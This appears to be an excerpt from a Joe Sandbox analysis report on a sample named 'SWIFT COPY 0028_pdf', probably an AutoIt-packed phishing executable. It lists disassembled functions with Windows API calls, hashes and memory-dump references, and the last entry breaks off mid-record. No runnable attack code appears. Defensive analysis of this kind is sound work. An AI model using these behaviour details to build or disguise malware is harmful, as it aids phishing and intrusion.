                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009890AB
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009890BC
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009890D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 16345e4dbc3a136f7e50906c9d78900c267094fda10285b3574ce20dc8b5e7b2
                                                                                    • Instruction ID: b01f15e5da4da58d8c93236d6abd9210ddd7f7de73acbdb8e455658c9cdf81e2
                                                                                    • Opcode Fuzzy Hash: 16345e4dbc3a136f7e50906c9d78900c267094fda10285b3574ce20dc8b5e7b2
                                                                                    • Instruction Fuzzy Hash: A6313675618215EFDB21DF58DC84F6537A9FB4A714F180164F61A8F2B1CBB1AC40EB81
                                                                                    Function 009608AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009608F2
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00960918
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0096091B
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00960939
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00960942
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00960967
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00960975
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 956abb0e0348f663bc435e5cc17d33e3e380baabbdaac422ed8c97bce63d35f6
                                                                                    • Instruction ID: a11f41c49adbcdda3ccd3f9f1609324810249bed0f42c7d63bc4f4a2d629e656
                                                                                    • Opcode Fuzzy Hash: 956abb0e0348f663bc435e5cc17d33e3e380baabbdaac422ed8c97bce63d35f6
                                                                                    • Instruction Fuzzy Hash: 1521A776605219AFAB109F78CCC8DBB73ECEF49360B008525F919DB2A1D674EC45DBA0
                                                                                    Function 00962472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 1038674560-2734436370
                                                                                    • Opcode ID: f9528b9413b7d3f9e98e6ee6b66be40a44f35386f2fdb4eb0124c5b816257e00
                                                                                    • Instruction ID: 93d2d3cde7a206a1bccb200c427a778caf7de56276113f84852ef7a71f649ba3
                                                                                    • Opcode Fuzzy Hash: f9528b9413b7d3f9e98e6ee6b66be40a44f35386f2fdb4eb0124c5b816257e00
                                                                                    • Instruction Fuzzy Hash: DA218E72648A11B7C334AB34DC12FBB73ACEFE5310F50442AF44B97181EB659982C395
                                                                                    Function 00960986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009609CB
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009609F1
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 009609F4
                                                                                    • SysAllocString.OLEAUT32 ref: 00960A15
                                                                                    • SysFreeString.OLEAUT32 ref: 00960A1E
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00960A38
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00960A46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 1e5d6a611e6b5127240b61e05fec9b0404e4fd3be01820b2189b64984ab0e8a6
                                                                                    • Instruction ID: c019dbce0f5039bf7380c1c321bb965153b00313e333e4d95a94f56f08c8896a
                                                                                    • Opcode Fuzzy Hash: 1e5d6a611e6b5127240b61e05fec9b0404e4fd3be01820b2189b64984ab0e8a6
                                                                                    • Instruction Fuzzy Hash: BC217175615204AFDB10DFE8DCC8DAB77ECEF493A07008125F909CB2A1E674EC419B64
                                                                                    Function 0098A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0093D1BA
                                                                                      • Part of subcall function 0093D17C: GetStockObject.GDI32(00000011), ref: 0093D1CE
                                                                                      • Part of subcall function 0093D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0093D1D8
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0098A32D
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0098A33A
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0098A345
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0098A354
                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0098A360
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: 7bcc5837111873f438db50634617ddd74894a598b388da8535e4b7ce895377c9
                                                                                    • Instruction ID: 222449b060cae983fe7648bf483b25a9ad17f9b537f5c433ee699dc368709c5f
                                                                                    • Opcode Fuzzy Hash: 7bcc5837111873f438db50634617ddd74894a598b388da8535e4b7ce895377c9
                                                                                    • Instruction Fuzzy Hash: 8411D0B1150219BFEF105FA0CC85EEB7F6DFF08798F014116BA08A61A0C6729C21DBA4
                                                                                    Function 0093CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,?), ref: 0093CCF6
                                                                                    • GetWindowRect.USER32(?,?), ref: 0093CD37
                                                                                    • ScreenToClient.USER32(?,?), ref: 0093CD5F
                                                                                    • GetClientRect.USER32(?,?), ref: 0093CE8C
                                                                                    • GetWindowRect.USER32(?,?), ref: 0093CEA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                    • String ID:
                                                                                    • API String ID: 1296646539-0
                                                                                    • Opcode ID: 58dd29ae6e1055fa08bd95347fc960f43844f7e31c627a921d0df558622a47d2
                                                                                    • Instruction ID: 8f75f4bcec4b2427dcd2d9992adef59bb92d2989f197fddc2216eab32aa7b136
                                                                                    • Opcode Fuzzy Hash: 58dd29ae6e1055fa08bd95347fc960f43844f7e31c627a921d0df558622a47d2
                                                                                    • Instruction Fuzzy Hash: E5B137B9900649DBDF20CFA8C4807EEBBB5FF08300F149529EC69AB254DB34AD50DB64
                                                                                    Function 00981BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00981C18
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00981C26
                                                                                    • __wsplitpath.LIBCMT ref: 00981C54
                                                                                      • Part of subcall function 00941DFC: __wsplitpath_helper.LIBCMT ref: 00941E3C
                                                                                    • _wcscat.LIBCMT ref: 00981C69
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00981CDF
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00981CF1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 1380811348-0
                                                                                    • Opcode ID: cb198bc6980a77a264852189131f8382fc0758f3783614193d7eb406520f2735
                                                                                    • Instruction ID: 7c710f51689c59d772d14a38df135432e4bd9d575dd7a9e2c778c77863fca082
                                                                                    • Opcode Fuzzy Hash: cb198bc6980a77a264852189131f8382fc0758f3783614193d7eb406520f2735
                                                                                    • Instruction Fuzzy Hash: E9513DB15083509FD724EF24D885FABB7ECEF88754F00491EF58A97291DB709905CB92
                                                                                    Function 00982FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00983C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009830AF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009830EF
                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00983112
                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0098313B
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0098317E
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0098318B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                    • String ID:
                                                                                    • API String ID: 3451389628-0
                                                                                    • Opcode ID: 749c5035db74279d8c0dc38f63d148ecc7c9c9cf14666902234ba78d0c1cc713
                                                                                    • Instruction ID: 26ddbacb241eb5060bb4878e05c53828f83992b90161926ef5d65fd110878533
                                                                                    • Opcode Fuzzy Hash: 749c5035db74279d8c0dc38f63d148ecc7c9c9cf14666902234ba78d0c1cc713
                                                                                    • Instruction Fuzzy Hash: 7B514871208310AFC704EF64D895E6EBBE9FF89700F04891DF595872A1DB71EA05CB92
                                                                                    Function 009884DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetMenu.USER32(?), ref: 00988540
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00988577
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0098859F
                                                                                    • GetMenuItemID.USER32(?,?), ref: 0098860E
                                                                                    • GetSubMenu.USER32(?,?), ref: 0098861C
                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0098866D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                    • String ID:
                                                                                    • API String ID: 650687236-0
                                                                                    • Opcode ID: 3a0bab8ced037c0edf7d4cb5468c89b9c313ab2bdebb271a5ce4faf30b0011f2
                                                                                    • Instruction ID: a03c879559d79ce64cd1b26474479d3ae39d7fa54ad3267f161b30e59c5b53b5
                                                                                    • Opcode Fuzzy Hash: 3a0bab8ced037c0edf7d4cb5468c89b9c313ab2bdebb271a5ce4faf30b0011f2
                                                                                    • Instruction Fuzzy Hash: 7C519071E00225AFCF11EF54C845AAEB7F8EF88310F104499F916BB351DB30AE418BA0
                                                                                    Function 00964AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00964B10
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00964B5B
                                                                                    • IsMenu.USER32(00000000), ref: 00964B7B
                                                                                    • CreatePopupMenu.USER32 ref: 00964BAF
                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00964C0D
                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00964C3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3311875123-0
                                                                                    • Opcode ID: 913bce0f7c45b715457ee16b617db15b986051abc879947493d03ac1572f0e75
                                                                                    • Instruction ID: 7a9e88e9765345cec02b605e355193d6d31051979bf8f739d20b2fa1ce0f3260
                                                                                    • Opcode Fuzzy Hash: 913bce0f7c45b715457ee16b617db15b986051abc879947493d03ac1572f0e75
                                                                                    • Instruction Fuzzy Hash: 0E51E070A02309EFDF25CFA8C888BEEBBF8AF45318F144159E4959B291E7749944CB51
                                                                                    Function 00978DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,009BDC00), ref: 00978E7C
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978E89
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00978EAD
                                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00978EC5
                                                                                    • _strlen.LIBCMT ref: 00978EF7
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978F6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_strlenselect
                                                                                    • String ID:
                                                                                    • API String ID: 2217125717-0
                                                                                    • Opcode ID: 3791321f3cc4c4c0e37c5e38d8604ad429d27bf237df673232f485722a015cc1
                                                                                    • Instruction ID: dc5f2373ff767eaf3665139b572a49e19cdc034af241e216637891b3df5fedda
                                                                                    • Opcode Fuzzy Hash: 3791321f3cc4c4c0e37c5e38d8604ad429d27bf237df673232f485722a015cc1
                                                                                    • Instruction Fuzzy Hash: 6341A472600104AFCB14EBA4DD99FAEB7BDAF98310F108559F51A972D1DF30AE40CBA0
                                                                                    Function 0093ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • BeginPaint.USER32(?,?,?), ref: 0093AC2A
                                                                                    • GetWindowRect.USER32(?,?), ref: 0093AC8E
                                                                                    • ScreenToClient.USER32(?,?), ref: 0093ACAB
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0093ACBC
                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0093AD06
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0099E673
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                    • String ID:
                                                                                    • API String ID: 2592858361-0
                                                                                    • Opcode ID: 6beca596afa0845c6df4343c5c1eb5e927127d535e3690f484c24baf1e05378d
                                                                                    • Instruction ID: 0c2e10a4cf0a9286c468679bcfb9a8c6dce69418b133fc439fe3b34e7e0b66a6
                                                                                    • Opcode Fuzzy Hash: 6beca596afa0845c6df4343c5c1eb5e927127d535e3690f484c24baf1e05378d
                                                                                    • Instruction Fuzzy Hash: F941A1701092009FCB11DF28CC84FBA7BA8FF5A720F040669F9A58B2A1D7359D45EF62
                                                                                    Function 0098E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(009E1628,00000000,009E1628,00000000,00000000,009E1628,?,0099DC5D,00000000,?,00000000,00000000,00000000,?,0099DAD1,00000004), ref: 0098E40B
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0098E42F
                                                                                    • ShowWindow.USER32(009E1628,00000000), ref: 0098E48F
                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0098E4A1
                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0098E4C5
                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0098E4E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: e9017461e5af40504dc64a625d7003c8d778ca66d1036a3c837dc886fe029e6c
                                                                                    • Instruction ID: d2274698e15d366ba0ec983d1040942bd68fbad462ed9d9488426ac493322923
                                                                                    • Opcode Fuzzy Hash: e9017461e5af40504dc64a625d7003c8d778ca66d1036a3c837dc886fe029e6c
                                                                                    • Instruction Fuzzy Hash: E4415E30605140EFDB26DF34C4A9F947BE5BF09304F1881A9EA5D8F2B2C731A845DB91
                                                                                    Function 009698BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 009698D1
                                                                                      • Part of subcall function 0093F4EA: std::exception::exception.LIBCMT ref: 0093F51E
                                                                                      • Part of subcall function 0093F4EA: __CxxThrowException@8.LIBCMT ref: 0093F533
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00969908
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00969924
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0096999E
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009699B3
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 009699D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 2537439066-0
                                                                                    • Opcode ID: 00f5a0b2aebdf3f880167c7102ddb18e495c37a7bec92ff0d24913d27e010114
                                                                                    • Instruction ID: 43f95088e6bd8883d0ed295a834355a53976a256a732c66cfd82b864bf34096c
